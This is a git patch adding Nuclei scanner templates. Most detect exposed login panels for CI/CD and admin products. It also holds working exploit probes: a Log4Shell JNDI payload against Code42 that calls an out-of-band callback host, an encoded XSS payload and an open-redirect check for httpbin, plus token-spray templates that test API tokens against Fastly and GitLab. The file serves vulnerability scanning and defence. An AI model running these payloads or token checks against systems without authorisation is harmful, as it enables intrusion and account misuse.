From aa47b1d97b2cbc8a46d304aeeb2c38c86a7a1953 Mon Sep 17 00:00:00 2001
From: Adam Crosser <45573557+AdamCrosser@users.noreply.github.com>
Date: Wed, 16 Mar 2022 08:17:58 -0500
Subject: [PATCH] Added 23 Nuclei Templates (#3909)

* Added 23 Nuclei Templates

* Update cofense-vision-detection.yml

* Update sophos-mobile-panel-detection.yml

* Update cofense-vision-detection.yml

* Update httpbin-open-redirect.yml

* Update httpbin-xss.yml

* Update ansible-semaphore-panel.yml

* Rename ansible-semaphore-panel.yml to ansible-semaphore-panel.yaml

* Update and rename avatier_password_management.yml to avatier-password-management.yaml

* Update and rename buddy-panel.yml to buddy-panel.yaml

* Update and rename buildbot-panel.yml to buildbot-panel.yaml

* Update and rename cofense-vision-detection.yml to cofense-vision-panel.yaml

* Update and rename concourse-ci-panel.yml to concourse-ci-panel.yaml

* Update and rename drone-ci-panel.yml to drone-ci-panel.yaml

* Update and rename flowci-detection.yml to flowci-panel.yaml

* Update and rename gradle-enterprise-build-cache-detect.yml to gradle-cache-node-detect.yaml

* Update and rename exposed-panels/gradle-cache-node-detect.yaml to exposed-panels/gradle/gradle-cache-node-detect.yaml

* Update and rename exposed-panels/gradle-enterprise-panel.yml to exposed-panels/gradle/gradle-enterprise-panel.yaml

* Update and rename httpbin-detection.yml to httpbin-panel.yaml

* Update and rename leostream-detection.yml to leostream-panel.yaml

* Delete redash-detection.yml

* Update and rename sophos-mobile-panel-detection.yml to sophos-mobile-panel.yaml

* Update and rename splunk-enterprise-login-panel.yml to splunk-enterprise-panel.yaml

* Update splunk-enterprise-panel.yaml

* Update and rename stridercd-detection.yml to stridercd-panel.yaml

* Update and rename zuul-panel.yml to zuul-panel.yaml

* Update and rename zentral-detection.yml to zentral-panel.yaml

* Update and rename api-fastly.yml to api-fastly.yaml

* Update and rename api-gitlab.yml to api-gitlab.yaml

* Update and rename httpbin-xss.yml to httpbin-xss.yaml

* Update and rename httpbin-open-redirect.yml to httpbin-open-redirect.yaml

* Update and rename log4j-code42-rce.yml to code42-log4j-rce.yaml

* minor matcher fixes

* added missing hostname variable

* meta data update

Co-authored-by: Prince Chaddha <prince@projectdiscovery.io>
Co-authored-by: sandeep <sandeep@projectdiscovery.io>
---
 exposed-panels/ansible-semaphore-panel.yaml   | 27 ++++++++++++++
 .../avatier-password-management.yaml          | 23 ++++++++++++
 exposed-panels/buddy-panel.yaml               | 30 ++++++++++++++++
 exposed-panels/buildbot-panel.yaml            | 28 +++++++++++++++
 exposed-panels/cofense-vision-panel.yaml      | 27 ++++++++++++++
 exposed-panels/concourse-ci-panel.yaml        | 24 +++++++++++++
 exposed-panels/drone-ci-panel.yaml            | 27 ++++++++++++++
 exposed-panels/flowci-panel.yaml              | 25 +++++++++++++
 .../gradle/gradle-cache-node-detect.yaml      | 25 +++++++++++++
 .../gradle/gradle-enterprise-panel.yaml       | 21 +++++++++++
 exposed-panels/httpbin-panel.yaml             | 25 +++++++++++++
 exposed-panels/leostream-panel.yaml           | 24 +++++++++++++
 exposed-panels/sophos-mobile-panel.yaml       | 20 +++++++++++
 exposed-panels/splunk-enterprise-panel.yaml   | 35 +++++++++++++++++++
 exposed-panels/stridercd-panel.yaml           | 24 +++++++++++++
 exposed-panels/zentral-panel.yaml             | 22 ++++++++++++
 exposed-panels/zuul-panel.yaml                | 33 +++++++++++++++++
 token-spray/api-fastly.yaml                   | 24 +++++++++++++
 token-spray/api-gitlab.yaml                   | 24 +++++++++++++
 vulnerabilities/code42/code42-log4j-rce.yaml  | 35 +++++++++++++++++++
 .../httpbin/httpbin-open-redirect.yaml        | 27 ++++++++++++++
 vulnerabilities/httpbin/httpbin-xss.yaml      | 33 +++++++++++++++++
 22 files changed, 583 insertions(+)
 create mode 100644 exposed-panels/ansible-semaphore-panel.yaml
 create mode 100644 exposed-panels/avatier-password-management.yaml
 create mode 100644 exposed-panels/buddy-panel.yaml
 create mode 100644 exposed-panels/buildbot-panel.yaml
 create mode 100644 exposed-panels/cofense-vision-panel.yaml
 create mode 100644 exposed-panels/concourse-ci-panel.yaml
 create mode 100644 exposed-panels/drone-ci-panel.yaml
 create mode 100644 exposed-panels/flowci-panel.yaml
 create mode 100644 exposed-panels/gradle/gradle-cache-node-detect.yaml
 create mode 100644 exposed-panels/gradle/gradle-enterprise-panel.yaml
 create mode 100644 exposed-panels/httpbin-panel.yaml
 create mode 100644 exposed-panels/leostream-panel.yaml
 create mode 100644 exposed-panels/sophos-mobile-panel.yaml
 create mode 100644 exposed-panels/splunk-enterprise-panel.yaml
 create mode 100644 exposed-panels/stridercd-panel.yaml
 create mode 100644 exposed-panels/zentral-panel.yaml
 create mode 100644 exposed-panels/zuul-panel.yaml
 create mode 100644 token-spray/api-fastly.yaml
 create mode 100644 token-spray/api-gitlab.yaml
 create mode 100644 vulnerabilities/code42/code42-log4j-rce.yaml
 create mode 100644 vulnerabilities/httpbin/httpbin-open-redirect.yaml
 create mode 100644 vulnerabilities/httpbin/httpbin-xss.yaml

diff --git a/exposed-panels/ansible-semaphore-panel.yaml b/exposed-panels/ansible-semaphore-panel.yaml
new file mode 100644
index 0000000000..bb97ffa9b6
--- /dev/null
+++ b/exposed-panels/ansible-semaphore-panel.yaml
@@ -0,0 +1,27 @@
+id: ansible-semaphore-panel
+
+info:
+  name: Ansible Semaphore Panel Detect
+  author: Yuzhe-zhang-0
+  severity: info
+  reference:
+    - https://ansible-semaphore.com/
+    - https://github.com/ansible-semaphore/semaphore
+  metadata:
+    shodan-query: http.html:"Semaphore</title>"
+  tags: panel,ansible,semaphore,cicd,oss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/auth/login'
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        words:
+          - '<title>Ansible Semaphore</title>'
+
+      - type: regex
+        regex:
+          - '<title(.*)>Semaphore</title>'
diff --git a/exposed-panels/avatier-password-management.yaml b/exposed-panels/avatier-password-management.yaml
new file mode 100644
index 0000000000..253126f16b
--- /dev/null
+++ b/exposed-panels/avatier-password-management.yaml
@@ -0,0 +1,23 @@
+id: avatier-password-management
+
+info:
+  name: Avatier Password Management Panel Detect
+  author: praetorian-thendrickson
+  severity: info
+  reference: https://www.avatier.com
+  metadata:
+    shodan-query: http.favicon.hash:983734701
+  tags: panel,avatier
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/aims/ps/'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'LabelWelcomeToPS'
+          - 'Avatier Corporation'
+        condition: and
diff --git a/exposed-panels/buddy-panel.yaml b/exposed-panels/buddy-panel.yaml
new file mode 100644
index 0000000000..b227e65241
--- /dev/null
+++ b/exposed-panels/buddy-panel.yaml
@@ -0,0 +1,30 @@
+id: buddy-panel
+
+info:
+  name: Buddy Panel Detect
+  author: thardt-praetorian
+  severity: info
+  reference: https://buddy.works
+  metadata:
+    shodan-query: http.favicon.hash:-850502287
+  tags: panel,buddy,cicd
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<meta name="application-name" content="Buddy">'
+          - 'Buddy App'
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/buildbot-panel.yaml b/exposed-panels/buildbot-panel.yaml
new file mode 100644
index 0000000000..c7713e24e5
--- /dev/null
+++ b/exposed-panels/buildbot-panel.yaml
@@ -0,0 +1,28 @@
+id: buildbot-panel
+
+info:
+  name: Buildbot Panel Detect
+  author: thardt-praetorian
+  severity: info
+  reference: https://buildbot.net
+  metadata:
+    shodan-query: http.title:"BuildBot"
+  tags: panel,buildbot,cicd
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - '<title(.*)>Buildbot</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/cofense-vision-panel.yaml b/exposed-panels/cofense-vision-panel.yaml
new file mode 100644
index 0000000000..50b5326d47
--- /dev/null
+++ b/exposed-panels/cofense-vision-panel.yaml
@@ -0,0 +1,27 @@
+id: cofense-vision-panel
+
+info:
+  name: Cofense Vision Panel Detect
+  author: Adam Crosser
+  severity: info
+  reference: https://cofense.com
+  metadata:
+    shodan-query: http.favicon.hash:739801466
+  tags: panel,cofense,vision
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/login'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>Vision</title>"
+          - "Cofense Inc."
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/concourse-ci-panel.yaml b/exposed-panels/concourse-ci-panel.yaml
new file mode 100644
index 0000000000..273493c803
--- /dev/null
+++ b/exposed-panels/concourse-ci-panel.yaml
@@ -0,0 +1,24 @@
+id: concourse-ci-panel
+
+info:
+  name: Concourse CI Panel Detect
+  author: praetorian-thendrickson
+  severity: info
+  reference:
+    - https://github.com/concourse/concourse
+    - https://concourse-ci.org
+  metadata:
+    shodan-query: title:"Concourse"
+  tags: panel,concourse,oss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers:
+      - type: word
+        words:
+          - '<title>Concourse</title>'
+          - 'login to Concourse'
+        condition: or
diff --git a/exposed-panels/drone-ci-panel.yaml b/exposed-panels/drone-ci-panel.yaml
new file mode 100644
index 0000000000..5c45f9429b
--- /dev/null
+++ b/exposed-panels/drone-ci-panel.yaml
@@ -0,0 +1,27 @@
+id: drone-ci-panel
+
+info:
+  name: Drone CI Panel Detect
+  author: Yuzhe-zhang-0
+  severity: info
+  reference: https://www.drone.io
+  metadata:
+    shodan-query: http.favicon.hash:1354079303
+  tags: panel,droneci,cicd
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/welcome'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>Drone CI</title>'
+          - '<title>Drone | Continuous Integration</title>'
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/flowci-panel.yaml b/exposed-panels/flowci-panel.yaml
new file mode 100644
index 0000000000..35baec0f8f
--- /dev/null
+++ b/exposed-panels/flowci-panel.yaml
@@ -0,0 +1,25 @@
+id: flowci-panel
+
+info:
+  name: FlowCI Panel Detect
+  author: Adam Crosser
+  severity: info
+  reference:
+    - https://github.com/FlowCI/flow-web-x
+    - https://flowci.github.io/#/
+  tags: panel,flowci
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>flow-web-x</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/gradle/gradle-cache-node-detect.yaml b/exposed-panels/gradle/gradle-cache-node-detect.yaml
new file mode 100644
index 0000000000..4a92dd9961
--- /dev/null
+++ b/exposed-panels/gradle/gradle-cache-node-detect.yaml
@@ -0,0 +1,25 @@
+id: gradle-cache-node-detect
+
+info:
+  name: Gradle Enterprise Build Cache Node Detect
+  author: Adam Crosser
+  severity: info
+  reference: https://gradle.com
+  tags: panel,gradle,cache
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers:
+      - type: regex
+        regex:
+          - "<span>Gradle Enterprise Build Cache Node (.*)</span>"
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - "<span>Gradle Enterprise Build Cache Node (.*)</span>"
diff --git a/exposed-panels/gradle/gradle-enterprise-panel.yaml b/exposed-panels/gradle/gradle-enterprise-panel.yaml
new file mode 100644
index 0000000000..716a32d537
--- /dev/null
+++ b/exposed-panels/gradle/gradle-enterprise-panel.yaml
@@ -0,0 +1,21 @@
+id: gradle-enterprise-panel
+
+info:
+  name: Gradle Enterprise Panel Detect
+  author: Adam Crosser
+  severity: info
+  tags: panel,gradle
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Gradle Enterprise</title>"
diff --git a/exposed-panels/httpbin-panel.yaml b/exposed-panels/httpbin-panel.yaml
new file mode 100644
index 0000000000..2118039848
--- /dev/null
+++ b/exposed-panels/httpbin-panel.yaml
@@ -0,0 +1,25 @@
+id: httpbin-panel
+
+info:
+  name: HTTPBin Panel Detect
+  author: Adam Crosser
+  severity: info
+  reference: https://github.com/postmanlabs/httpbin
+  metadata:
+    shodan-query: http.title:"httpbin.org"
+  tags: panel,httpbin,oss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>httpbin.org</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/leostream-panel.yaml b/exposed-panels/leostream-panel.yaml
new file mode 100644
index 0000000000..12169c7e42
--- /dev/null
+++ b/exposed-panels/leostream-panel.yaml
@@ -0,0 +1,24 @@
+id: leostream-panel
+info:
+  name: Leostream Panel Detect
+  author: praetorian-thendrickson
+  severity: info
+  reference: https://leostream.com
+  metadata:
+    shodan-query: http.title:"Leostream"
+  tags: panel,leostream
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>Leostream</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/sophos-mobile-panel.yaml b/exposed-panels/sophos-mobile-panel.yaml
new file mode 100644
index 0000000000..889f6e7a16
--- /dev/null
+++ b/exposed-panels/sophos-mobile-panel.yaml
@@ -0,0 +1,20 @@
+id: sophos-mobile-panel
+
+info:
+  name: Sophos Mobile Panel Detect
+  author: Adam Crosser
+  severity: info
+  reference: https://www.sophos.com/en-us/products/mobile-control
+  metadata:
+    shodan-query: http.title:"Sophos Mobile"
+  tags: panel,sophos
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/login.xhtml?faces-redirect=true'
+
+    matchers:
+      - type: word
+        words:
+          - "<title>Sophos Mobile</title>"
diff --git a/exposed-panels/splunk-enterprise-panel.yaml b/exposed-panels/splunk-enterprise-panel.yaml
new file mode 100644
index 0000000000..c513c12c53
--- /dev/null
+++ b/exposed-panels/splunk-enterprise-panel.yaml
@@ -0,0 +1,35 @@
+id: splunk-enterprise-panel
+
+info:
+  name: Splunk Enterprise Panel Detect
+  author: praetorian-thendrickson
+  severity: info
+  reference: https://www.splunk.com/en_us/software/splunk-enterprise.html
+  metadata:
+    shodan-query: http.title:"Login - Splunk"
+  tags: panel,splunk
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/en-US/account/login'
+
+    redirects: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'Splunk Inc.'
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '"version": "(.*)"'
+          - 'versionNumber": "([0-9.]+)"'
+          - '"VERSION_LABEL": "([0-9.]+)"'
diff --git a/exposed-panels/stridercd-panel.yaml b/exposed-panels/stridercd-panel.yaml
new file mode 100644
index 0000000000..f6181ff662
--- /dev/null
+++ b/exposed-panels/stridercd-panel.yaml
@@ -0,0 +1,24 @@
+id: stridercd-panel
+
+info:
+  name: StriderCD Panel
+  author: Adam Crosser
+  severity: info
+  reference:
+    - https://github.com/Strider-CD/strider
+    - https://strider-cd.github.io
+  metadata:
+    shodan-query: http.favicon.hash:115295460
+  tags: panel,cicd,oss,stridercd,strider
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    redirects: true
+    max-redirects: 2
+    matchers:
+      - type: word
+        words:
+          - "Strider: Brilliant Continuous Deployment"
diff --git a/exposed-panels/zentral-panel.yaml b/exposed-panels/zentral-panel.yaml
new file mode 100644
index 0000000000..62e05ae148
--- /dev/null
+++ b/exposed-panels/zentral-panel.yaml
@@ -0,0 +1,22 @@
+id: zentral-panel
+
+info:
+  name: Zentral pANEL Detect
+  author: Adam Crosser
+  severity: info
+  reference:
+    - https://github.com/zentralopensource/zentral
+    - https://zentral.io
+  tags: panel,zentral,oss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers:
+      - type: word
+        words:
+          - '<title>Zentral</title>'
+          - '<div class="panel-footer btn-group btn-group-justified"'
+        condition: and
diff --git a/exposed-panels/zuul-panel.yaml b/exposed-panels/zuul-panel.yaml
new file mode 100644
index 0000000000..a5f9f572cf
--- /dev/null
+++ b/exposed-panels/zuul-panel.yaml
@@ -0,0 +1,33 @@
+id: zuul-panel
+
+info:
+  name: Zuul Panel Detect
+  author: Yuzhe-zhang-0
+  severity: info
+  reference: https://opendev.org/zuul/zuul
+  metadata:
+    shodan-query: http.favicon.hash:-1127895693
+  tags: panel,zuul,cicd,oss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/api/tenants'
+      - '{{BaseURL}}/api/status'
+
+    redirects: true
+    max-redirects: 2
+    stop-at-first-match: true
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"name":'
+          - '"projects":'
+          - '"queue":'
+        condition: and
+
+      - type: word
+        words:
+          - 'zuul_version'
diff --git a/token-spray/api-fastly.yaml b/token-spray/api-fastly.yaml
new file mode 100644
index 0000000000..8a472e2ab1
--- /dev/null
+++ b/token-spray/api-fastly.yaml
@@ -0,0 +1,24 @@
+id: api-fastly
+
+info:
+  name: Fastly API Test
+  author: Adam Crosser
+  severity: info
+  reference: https://developer.fastly.com/reference/api/
+  tags: token-spray,fastly
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://api.fastly.com/current_user"
+    headers:
+      Fastly-Key: "{{token}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"created_at":'
+          - '"customer_id":'
+        condition: and
diff --git a/token-spray/api-gitlab.yaml b/token-spray/api-gitlab.yaml
new file mode 100644
index 0000000000..69554497fa
--- /dev/null
+++ b/token-spray/api-gitlab.yaml
@@ -0,0 +1,24 @@
+id: api-gitlab
+
+info:
+  name: Gitlab API Test
+  author: Adam Crosser
+  severity: info
+  reference: https://docs.gitlab.com/ee/api/personal_access_tokens.html
+  tags: token-spray,gitlab
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://gitlab.com/api/v4/personal_access_tokens"
+    headers:
+      PRIVATE-TOKEN: "{{token}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"id":'
+          - '"created_at":'
+        condition: and
diff --git a/vulnerabilities/code42/code42-log4j-rce.yaml b/vulnerabilities/code42/code42-log4j-rce.yaml
new file mode 100644
index 0000000000..ab51e3525a
--- /dev/null
+++ b/vulnerabilities/code42/code42-log4j-rce.yaml
@@ -0,0 +1,35 @@
+id: code42-log4j-rce
+
+info:
+  name: Log4j Code42 RCE
+  author: Adam Crosser
+  severity: critical
+  description: Remote code execution via log4j vulnerability
+  reference: https://support.code42.com/Terms_and_conditions/Code42_customer_support_resources/Code42_response_to_industry_security_incidents
+  classification:
+    cve-id: CVE-2021-44228
+  tags: jndi,log4j,rce,cve,cve2021,oast,code42
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&url=https://localhost'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
+
+      - type: regex
+        part: interactsh_request
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Match for extracted ${hostName} variable
+
+    extractors:
+      - type: regex
+        part: interactsh_request
+        group: 1
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${hostName} in output
diff --git a/vulnerabilities/httpbin/httpbin-open-redirect.yaml b/vulnerabilities/httpbin/httpbin-open-redirect.yaml
new file mode 100644
index 0000000000..3e6b67d5df
--- /dev/null
+++ b/vulnerabilities/httpbin/httpbin-open-redirect.yaml
@@ -0,0 +1,27 @@
+id: httpbin-open-redirect
+
+info:
+  name: HTTPBin - Open Redirect
+  author: Adam Crosser
+  severity: low
+  metadata:
+    shodan-query:
+      - html:"https://github.com/requests/httpbin"
+      - title:"httpbin.org"
+  reference: https://github.com/postmanlabs/httpbin
+  tags: redirect,httpbin,oss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/redirect-to?url=https%3A%2F%2Fexample.com"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'location == "https://example.com"'
+
+      - type: status
+        status:
+          - 302
\ No newline at end of file
diff --git a/vulnerabilities/httpbin/httpbin-xss.yaml b/vulnerabilities/httpbin/httpbin-xss.yaml
new file mode 100644
index 0000000000..929512ea1d
--- /dev/null
+++ b/vulnerabilities/httpbin/httpbin-xss.yaml
@@ -0,0 +1,33 @@
+id: httpbin-xss
+
+info:
+  name: HTTPBin - Cross Site Scripting
+  author: Adam Crosser
+  severity: medium
+  reference: https://github.com/postmanlabs/httpbin
+  metadata:
+    shodan-query:
+      - html:"https://github.com/requests/httpbin"
+      - title:"httpbin.org"
+  tags: xss,httpbin,oss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+'
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - '^<script>alert\(document.domain\)</script>$'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200